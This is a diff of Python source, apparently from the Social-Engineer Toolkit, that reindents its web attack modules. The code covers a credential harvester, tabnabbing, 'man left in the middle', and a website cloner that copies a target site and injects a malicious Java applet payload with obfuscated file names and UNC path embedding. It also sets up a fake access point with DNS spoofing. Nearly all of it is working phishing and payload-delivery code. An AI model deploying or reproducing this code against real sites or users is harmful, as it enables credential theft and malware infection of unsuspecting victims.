debug_msg(me,"importing 'src.webattack.tabnabbing.tabnabbing'",1)
try: reload(tabnabbing)
except: import tabnabbing
# if the harvester is on set the multi_harvester flag
sys.path.append("src/webattack/harvester")
if java_applet == "on" or meta_attack == "on":
pexpect_flag="on"
a=subprocess.Popen("python src/webattack/harvester/harvester.py", shell=True)
# start stuff for mlitm
if mlitm == "on":
sys.path.append("src/webattack/mlitm")
if java_applet == "on" or meta_attack == "on":
a=subprocess.Popen("python src/mlitm/mlitm.py")
else:
debug_msg(me,"importing 'src.mlitm.mlitm'",1)
try: reload(mlitm)
except: import mlitm
sys.path.append("src/webattack/mlitm")
if java_applet == "on" or meta_attack == "on":
a=subprocess.Popen("python src/mlitm/mlitm.py")
else:
debug_msg(me,"importing 'src.mlitm.mlitm'",1)
try: reload(mlitm)
except: import mlitm
# start the web server
if java_applet == "on" or meta_attack == "on":
sys.path.append("src/html/")
debug_msg(me,"importing 'src.html.spawn'",1)
try: reload(spawn)
except: import spawn
sys.path.append("src/html/")
debug_msg(me,"importing 'src.html.spawn'",1)
try: reload(spawn)
except: import spawn
# if using man left in the middle
if mlitm == "on":
try:
# a.terminate only works on Python > 2.6
a.terminate()
except AttributeError:
# if it fails pull pid for subprocess thread then terminate it
os.kill( a.pid , signal.SIGTERM)
# if using man left in the middle
if mlitm == "on":
try:
# a.terminate only works on Python > 2.6
a.terminate()
except AttributeError:
# if it fails pull pid for subprocess thread then terminate it
os.kill( a.pid , signal.SIGTERM)
# if using cred harvester or tabnabbing
if harvester == "on" or tabnabbing == "on":
os.chdir(definepath)
sys.path.append("%s/src/webattack/harvester/" % (definepath))
import report_generator
try:
# a.terminate only works on Python > 2.6
a.terminate()
except AttributeError:
# if it fails pull pid for subprocess thread then terminate it
os.kill( a.pid , signal.SIGTERM)
print_status("\nReport exported.")
return_continue()
# if using cred harvester or tabnabbing
if harvester == "on" or tabnabbing == "on":
os.chdir(definepath)
sys.path.append("%s/src/webattack/harvester/" % (definepath))
import report_generator
try:
# a.terminate only works on Python > 2.6
a.terminate()
except AttributeError:
# if it fails pull pid for subprocess thread then terminate it
os.kill( a.pid , signal.SIGTERM)
print_status("\nReport exported.")
return_continue()

View file

@ -6,7 +6,7 @@
from src.core.setcore import return_continue, print_info
def prep_website():
print_info("This feature is currently under development and disabled.")
return_continue()
print_info("This feature is currently under development and disabled.")
return_continue()
prep_website()

View file

@ -19,7 +19,7 @@ for line in fileopen:
# grab attack_vector specification
fileopen=file("src/program_junk/attack_vector", "r")
for line in fileopen:
attack_vector=line.rstrip()
attack_vector=line.rstrip()
# need to see if we created file to trigger multi attack webjacking
multi_webjacking="off"
@ -30,7 +30,7 @@ if os.path.isfile("src/program_junk/multi_webjacking"):
# Open the IPADDR file
ipaddr=""
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
ipaddr = check_options("IPADDR=")
# pull URL field so we can pull favicon later on
fileopen=file("src/program_junk/site.template","r").readlines()

View file

@ -10,7 +10,7 @@ import sys
import time
import re
import shutil
import urllib2
import urllib2
operating_system = check_os()
definepath=os.getcwd()
@ -28,10 +28,10 @@ track_email = check_config("TRACK_EMAIL_ADDRESSES=").lower()
## Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input("Enter your IP address: ")
update_options("IPADDR=" + ipaddr)
ipaddr = raw_input("Enter your IP address: ")
update_options("IPADDR=" + ipaddr)
## Define base value
site_cloned = True
@ -41,7 +41,7 @@ meterpreter_iframe="8080"
## make dir if needed
if not os.path.isdir("src/program_junk/web_clone/"):
os.makedirs("src/program_junk/web_clone")
os.makedirs("src/program_junk/web_clone")
## if we used a proxy configuration from the set-proxy
if os.path.isfile("src/program_junk/proxy.confg"):
@ -120,41 +120,41 @@ try:
## clean up old stuff
## set counter
counter=0
# try except block in case no internet connection, route to Internet, etc.
try:
# check if we have wget, if we don't then use urllib2
wget = 0
if os.path.isfile("/usr/local/bin/wget"):
wget = 1
if os.path.isfile("/usr/bin/wget"):
wget = 1
if os.path.isfile("/usr/local/wget"):
wget = 1
# try except block in case no internet connection, route to Internet, etc.
try:
# check if we have wget, if we don't then use urllib2
wget = 0
if os.path.isfile("/usr/local/bin/wget"):
wget = 1
if os.path.isfile("/usr/bin/wget"):
wget = 1
if os.path.isfile("/usr/local/wget"):
wget = 1
if wget == 1:
subprocess.Popen('%s;cd src/program_junk/web_clone/;wget --no-check-certificate -O index.html -c -k -U "%s" %s;' % (proxy_config,user_agent,url), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if wget == 1:
subprocess.Popen('%s;cd src/program_junk/web_clone/;wget --no-check-certificate -O index.html -c -k -U "%s" %s;' % (proxy_config,user_agent,url), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if wget == 0:
# if we don't have wget installed we will use python to rip, not as good as wget
headers = { 'User-Agent' : user_agent }
# read in the websites
req = urllib2.Request(url, None, headers)
# read in the data from the initial request
html = urllib2.urlopen(req).read()
# if length isnt much then we didnt get the site cloned
if len(html) > 1:
# if the site has cloned properly
site_cloned = True
# open file for writing
filewrite = file("src/program_junk/web_clone/index.html", "w")
# write the data back from the request
filewrite.write(html)
# close the file
filewrite.close()
if wget == 0:
# if we don't have wget installed we will use python to rip, not as good as wget
headers = { 'User-Agent' : user_agent }
# read in the websites
req = urllib2.Request(url, None, headers)
# read in the data from the initial request
html = urllib2.urlopen(req).read()
# if length isnt much then we didnt get the site cloned
if len(html) > 1:
# if the site has cloned properly
site_cloned = True
# open file for writing
filewrite = file("src/program_junk/web_clone/index.html", "w")
# write the data back from the request
filewrite.write(html)
# close the file
filewrite.close()
# if it failed ;(
except:
pass
# if it failed ;(
except:
pass
## If the website did not clone properly, exit out.
if not os.path.isfile("src/program_junk/web_clone/index.html"):
@ -166,21 +166,21 @@ try:
filewrite.write("failed")
filewrite.close()
if os.path.isfile("src/program_junk/web_clone/index.html"):
fileopen = file("src/program_junk/web_clone/index.html", "r")
counter = 0
for line in fileopen:
counter = counter + 1
if counter == 1 or counter == 0:
print bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC
return_continue()
site_cloned = False
os.remove("src/program_junk/web_clone/index.html")
if os.path.isfile("src/program_junk/web_clone/index.html"):
fileopen = file("src/program_junk/web_clone/index.html", "r")
counter = 0
for line in fileopen:
counter = counter + 1
if counter == 1 or counter == 0:
print bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC
return_continue()
site_cloned = False
os.remove("src/program_junk/web_clone/index.html")
## add file to let set interactive shell know it was unsuccessful
filewrite=file("src/program_junk/cloner.failed" , "w")
filewrite.write("failed")
filewrite.close()
## add file to let set interactive shell know it was unsuccessful
filewrite=file("src/program_junk/cloner.failed" , "w")
filewrite.write("failed")
filewrite.close()
if site_cloned == True:
@ -190,25 +190,25 @@ try:
if site_cloned == True:
# if we specify UNC embedding
if unc_embed == True:
fileopen=file("src/program_junk/web_clone/index.html","r")
index_database = fileopen.read()
filewrite = file("src/program_junk/web_clone/index.html", "w")
## Open the UNC EMBED
fileopen4=file("src/webattack/web_clone/unc.database", "r")
unc_database = fileopen4.read()
unc_database = unc_database.replace("IPREPLACEHERE", ipaddr)
unc_database = unc_database.replace("RANDOMNAME", rand_gen_win)
match = re.search("</body.*?>", index_database)
if match:
index_database = re.sub("</body.*?>", unc_database + "\n</body>", index_database)
if not match:
index_database = re.sub("<head.*?>", "\n<head>" + unc_database, index_database)
# if we specify UNC embedding
if unc_embed == True:
fileopen=file("src/program_junk/web_clone/index.html","r")
index_database = fileopen.read()
filewrite = file("src/program_junk/web_clone/index.html", "w")
filewrite.write(index_database)
filewrite.close()
## Open the UNC EMBED
fileopen4=file("src/webattack/web_clone/unc.database", "r")
unc_database = fileopen4.read()
unc_database = unc_database.replace("IPREPLACEHERE", ipaddr)
unc_database = unc_database.replace("RANDOMNAME", rand_gen_win)
match = re.search("</body.*?>", index_database)
if match:
index_database = re.sub("</body.*?>", unc_database + "\n</body>", index_database)
if not match:
index_database = re.sub("<head.*?>", "\n<head>" + unc_database, index_database)
filewrite.write(index_database)
filewrite.close()
## java applet attack vector
@ -218,105 +218,105 @@ try:
multi_java=True
if attack_vector == "java" or multi_java:
## Here we parse through the new website and add our java applet code, its a hack for now
## Wrote this on the plane to Russia, easiest way to do this without internet access :P
print bcolors.RED + "[*] Injecting Java Applet attack into the newly cloned website." + bcolors.ENDC
## Read in newly created index.html
time.sleep(2)
if not os.path.isfile("src/program_junk/web_clone/index.html"):
## trigger error that we were unable to grab the website :(
print_error("Unable to clone the website it appears. Email us to fix.")
sys.exit()
## Here we parse through the new website and add our java applet code, its a hack for now
## Wrote this on the plane to Russia, easiest way to do this without internet access :P
print bcolors.RED + "[*] Injecting Java Applet attack into the newly cloned website." + bcolors.ENDC
## Read in newly created index.html
time.sleep(2)
if not os.path.isfile("src/program_junk/web_clone/index.html"):
## trigger error that we were unable to grab the website :(
print_error("Unable to clone the website it appears. Email us to fix.")
sys.exit()
fileopen=file("src/program_junk/web_clone/index.html","r")
## Read add-on for java applet
fileopen2=file("src/webattack/web_clone/applet.database" , "r")
## Write to new file with java applet added
filewrite=file("src/program_junk/web_clone/index.html.new", "w")
fileopen3=file("src/webattack/web_clone/repeater.database", "r")
fileopen=file("src/program_junk/web_clone/index.html","r")
## Read add-on for java applet
fileopen2=file("src/webattack/web_clone/applet.database" , "r")
## Write to new file with java applet added
filewrite=file("src/program_junk/web_clone/index.html.new", "w")
fileopen3=file("src/webattack/web_clone/repeater.database", "r")
## this is our cloned website
index_database = fileopen.read()
## this is our applet database
applet_database = fileopen2.read()
## this is our repeater database
repeater_database = fileopen3.read()
## this is our cloned website
index_database = fileopen.read()
## this is our applet database
applet_database = fileopen2.read()
## this is our repeater database
repeater_database = fileopen3.read()
## here we begin replacing specifics in order to prep java applet payload
applet_database = applet_database.replace("msf.exe", rand_gen_win)
applet_database = applet_database.replace("mac.bin", rand_gen_mac)
applet_database = applet_database.replace("nix.bin", rand_gen_nix)
update_options("MSF.EXE=%s\nMAC.BIN=%s\nNIX.BIN=%s" % (rand_gen_win, rand_gen_mac, rand_gen_nix))
## here we begin replacing specifics in order to prep java applet payload
applet_database = applet_database.replace("msf.exe", rand_gen_win)
applet_database = applet_database.replace("mac.bin", rand_gen_mac)
applet_database = applet_database.replace("nix.bin", rand_gen_nix)
update_options("MSF.EXE=%s\nMAC.BIN=%s\nNIX.BIN=%s" % (rand_gen_win, rand_gen_mac, rand_gen_nix))
## close the file up
applet_database = applet_database.replace("ipaddrhere", ipaddr + ":" + str(web_port))
## close the file up
applet_database = applet_database.replace("ipaddrhere", ipaddr + ":" + str(web_port))
## set the java field
applet_database = applet_database.replace("IDREPLACEHERE", java_id)
## set the java field
applet_database = applet_database.replace("IDREPLACEHERE", java_id)
## set up everything for the unc path
if unc_embed == True:
unc_database = unc_database.replace("IPREPLACEHERE", ipaddr)
unc_database = unc_database.replace("RANDOMNAME", rand_gen_win)
## set up everything for the unc path
if unc_embed == True:
unc_database = unc_database.replace("IPREPLACEHERE", ipaddr)
unc_database = unc_database.replace("RANDOMNAME", rand_gen_win)
## set up the java repeater
if java_repeater == True:
repeater_database = repeater_database.replace("IDREPLACEHERE", java_id)
repeater_database = repeater_database.replace("TIMEHEREPLZ", java_time)
repeater_database = repeater_database.replace("URLHEREPLZ", url)
## set up the java repeater
if java_repeater == True:
repeater_database = repeater_database.replace("IDREPLACEHERE", java_id)
repeater_database = repeater_database.replace("TIMEHEREPLZ", java_time)
repeater_database = repeater_database.replace("URLHEREPLZ", url)
## do a quick sanity check and make sure body is standard
index_database = re.sub("</BODY.*?>", "</body>", index_database)
index_database = re.sub("<HEAD.*?>", "<head>", index_database)
index_database = re.sub("<BODY.*?>", "<body>", index_database)
## do a quick sanity check and make sure body is standard
index_database = re.sub("</BODY.*?>", "</body>", index_database)
index_database = re.sub("<HEAD.*?>", "<head>", index_database)
index_database = re.sub("<BODY.*?>", "<body>", index_database)
## start appending and prepping the index file
if java_repeater == True:
match = re.search("</body.*?>", index_database)
if match:
index_database = re.sub("<applet ", repeater_database + "\n<applet ", index_database)
if not match:
index_database = re.sub("<head.*?>", "\n<head>" + repeater_database, index_database)
counter = 0
## confirm we can find body
## start appending and prepping the index file
if java_repeater == True:
match = re.search("</body.*?>", index_database)
if match:
counter = 1
index_database = re.sub("</body.*?>", applet_database + "\n</body>", index_database)
if auto_redirect == True:
index_database = index_database.replace('<param name="9" value=""', '<param name="9" value="%s"' % (url))
index_database = re.sub("<applet ", repeater_database + "\n<applet ", index_database)
if not match:
match = re.search("<head.*?>", index_database)
if match:
counter = 1
index_database = re.sub("<head.*?>", "\n<head>" + applet_database, index_database)
if auto_redirect == True:
index_database = index_database.replace('<param name="9" value=""', '<param name="9" value="%s"' % (url))
index_database = re.sub("<head.*?>", "\n<head>" + repeater_database, index_database)
## start appending and prepping the index file
if java_repeater == True:
match = re.search("</body.*?>", index_database)
if match:
index_database = re.sub("<applet", repeater_database + "\n<applet ", index_database)
if not match:
index_database = re.sub("<head.*?>", "\n<head>" + repeater_database, index_database)
counter = 0
## confirm we can find body
match = re.search("</body.*?>", index_database)
if match:
counter = 1
index_database = re.sub("</body.*?>", applet_database + "\n</body>", index_database)
if auto_redirect == True:
index_database = index_database.replace('<param name="9" value=""', '<param name="9" value="%s"' % (url))
if not match:
match = re.search("<head.*?>", index_database)
if match:
counter = 1
index_database = re.sub("<head.*?>", "\n<head>" + applet_database, index_database)
if auto_redirect == True:
index_database = index_database.replace('<param name="9" value=""', '<param name="9" value="%s"' % (url))
## start appending and prepping the index file
if java_repeater == True:
match = re.search("</body.*?>", index_database)
if match:
index_database = re.sub("<applet", repeater_database + "\n<applet ", index_database)
if not match:
index_database = re.sub("<head.*?>", "\n<head>" + repeater_database, index_database)
if counter == 0:
print_error("Unable to clone the website...Sorry.")
print_error("This is usally caused by a missing body tag on a website.")
print_error("Try a diferent site and attempt it again.")
sys.exit(1)
if counter == 0:
print_error("Unable to clone the website...Sorry.")
print_error("This is usally caused by a missing body tag on a website.")
print_error("Try a diferent site and attempt it again.")
sys.exit(1)
## write the file out
filewrite.write(index_database)
## write the file out
filewrite.write(index_database)
## close the file after done writing
filewrite.close()
## close the file after done writing
filewrite.close()
print bcolors.BLUE + "[*] Filename obfuscation complete. Payload name is: " + rand_gen_win + "\n[*] Malicious java applet website prepped for deployment\n" + bcolors.ENDC
print bcolors.BLUE + "[*] Filename obfuscation complete. Payload name is: " + rand_gen_win + "\n[*] Malicious java applet website prepped for deployment\n" + bcolors.ENDC
## selection of browser exploits
## check to see if multiattack is in use
@ -329,12 +329,12 @@ try:
## Read in newly created index.html
if attack_vector == "multiattack":
if os.path.isfile("src/program_junk/web_clone/index.html"): os.remove("src/program_junk/web_clone/index.html")
# check to see if the file is there first
if not os.path.isfile("src/program_junk/web_clone/index.html.new"):
if os.path.isfile("src/program_junk/web_clone/index.html.bak"):
shutil.copyfile("src/program_junk/web_clone/index.html.bak", "src/program_junk/web_clone/index.html.new")
if os.path.isfile("src/program_junk/web_clone/index.html.new"):
shutil.copyfile("src/program_junk/web_clone/index.html.new", "src/program_junk/web_clone/index.html")
# check to see if the file is there first
if not os.path.isfile("src/program_junk/web_clone/index.html.new"):
if os.path.isfile("src/program_junk/web_clone/index.html.bak"):
shutil.copyfile("src/program_junk/web_clone/index.html.bak", "src/program_junk/web_clone/index.html.new")
if os.path.isfile("src/program_junk/web_clone/index.html.new"):
shutil.copyfile("src/program_junk/web_clone/index.html.new", "src/program_junk/web_clone/index.html")
time.sleep(1)
fileopen=file("src/program_junk/web_clone/index.html","r").readlines()
filewrite=file("src/program_junk/web_clone/index.html.new", "w")


@ -20,12 +20,12 @@ from config.set_config import AP_CHANNEL as ap_channel
from config.set_config import DNSSPOOF_PATH as dnsspoof_path
if not os.path.isfile(dnsspoof_path):
print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
exit_set()
print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
exit_set()
if not os.path.isfile(airbase_path):
airbase_path = "src/wireless/airbase-ng"
print_info("using SET's local airbase-ng binary")
print_info("using SET's local airbase-ng binary")
print_info("For this attack to work properly, we must edit the dhcp3-server file to include our wireless interface.")
print_info("""This will allow dhcp3 to properly assign IPs. (INTERFACES="at0")""")
@ -72,7 +72,7 @@ if fakeap_dhcp_menu_choice != "":
fakeap_dhcp_menu_choice = check_length(fakeap_dhcp_menu_choice,2)
# convert it to a string
fakeap_dhcp_menu_choice = str(fakeap_dhcp_menu_choice)
if fakeap_dhcp_menu_choice == "":
fakeap_dhcp_menu_choice = "1"